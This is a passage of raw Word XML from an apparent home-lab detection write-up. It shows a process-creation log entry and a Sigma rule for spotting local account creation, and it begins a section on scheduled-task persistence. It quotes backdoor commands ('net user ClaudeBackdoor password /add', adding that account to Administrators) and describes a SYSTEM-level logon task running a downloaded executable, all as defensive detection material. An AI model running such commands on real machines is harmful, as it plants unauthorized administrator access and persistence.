              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ProcessGuid: {4736c562-2273-6ab5-3503-000000001c00}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27DAB670">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ProcessId: 5220</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12800C9C">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7661E9B4">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image: C:\Windows\System32\net.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="259DAEA5">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CommandLine: net localgroup Administrators ClaudeBackdoor /add</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="610C8577">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CurrentDirectory: C:\Users\saada\Downloads</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F5314F8">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C211FEE">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User: SH-WIN10\saad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A10D10">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IntegrityLevel: High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="460874C6">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0675B4FE">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ParentProcessId: 10508</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="674034C2">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ParentImage: -</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6336EDB4">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ParentCommandLine: -</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A4A3CC1">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ParentUser: -</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ECD8341">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6600C950">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SHA256: 9F376759BCBCD705F726460FC4A7E2B07F310F52BAA73CAAAAA124FDDBDF993E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37361423"/>
    <w:p w14:paraId="3655DA78">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sigma 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Suspicious Local Account Creation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mapped Phase:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Phase 5A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC3C5C6">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This rule detects the use of the native Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>net.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility to create a local account. In the lab, the attacker created the account </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ClaudeBackdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>net user ClaudeBackdoor password /add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. The rule looks for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>net.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> together with a command line containing the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user &lt;account&gt; /add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern, making it behavior-focused rather than dependent on the specific account name.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="72746316">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552A41EF">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>title: Suspicious Local Account Creation via Net</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09BB40E0">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>status: test</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="103C61E5">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70E4D3E6">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>logsource:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56ADAFBC">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category: process_creation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F3B3F0">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product: windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78E035B2">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21F1B6EB">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>detection:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689086B8">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selection_image:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="660CF9CA">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Image|endswith: '\net.exe'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A553410">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4EFF34AE">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selection_command:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6173562C">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CommandLine|re: '(?i)\buser\s+[^ ]+\s+/add\b'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11E279BD">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1348549F">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condition: all of selection_*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1645DE23">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5FF457CC">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>level: high</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="143C871B">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="095E6A04">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tags:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BB4E4F2">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 attack.persistence</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E983D4D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  - attack.t1136.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D403C87">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C37F77">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434947A8">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C777A2">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">10 / PERSISTENCE + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>SCHEDULED TASK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E7381B">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 5B — Scheduled Task Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E2B7D">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A scheduled task can provide persistence by causing a payload or command to execute automatically when a specified trigger occurs. In this lab, the observed command uses schtasks.exe to create a task named GetClaudeBackdoor, configured to execute C:\Users\saada\Downloads\FreeClude.exe at user logon and run under the SYSTEM account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7629A90E">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
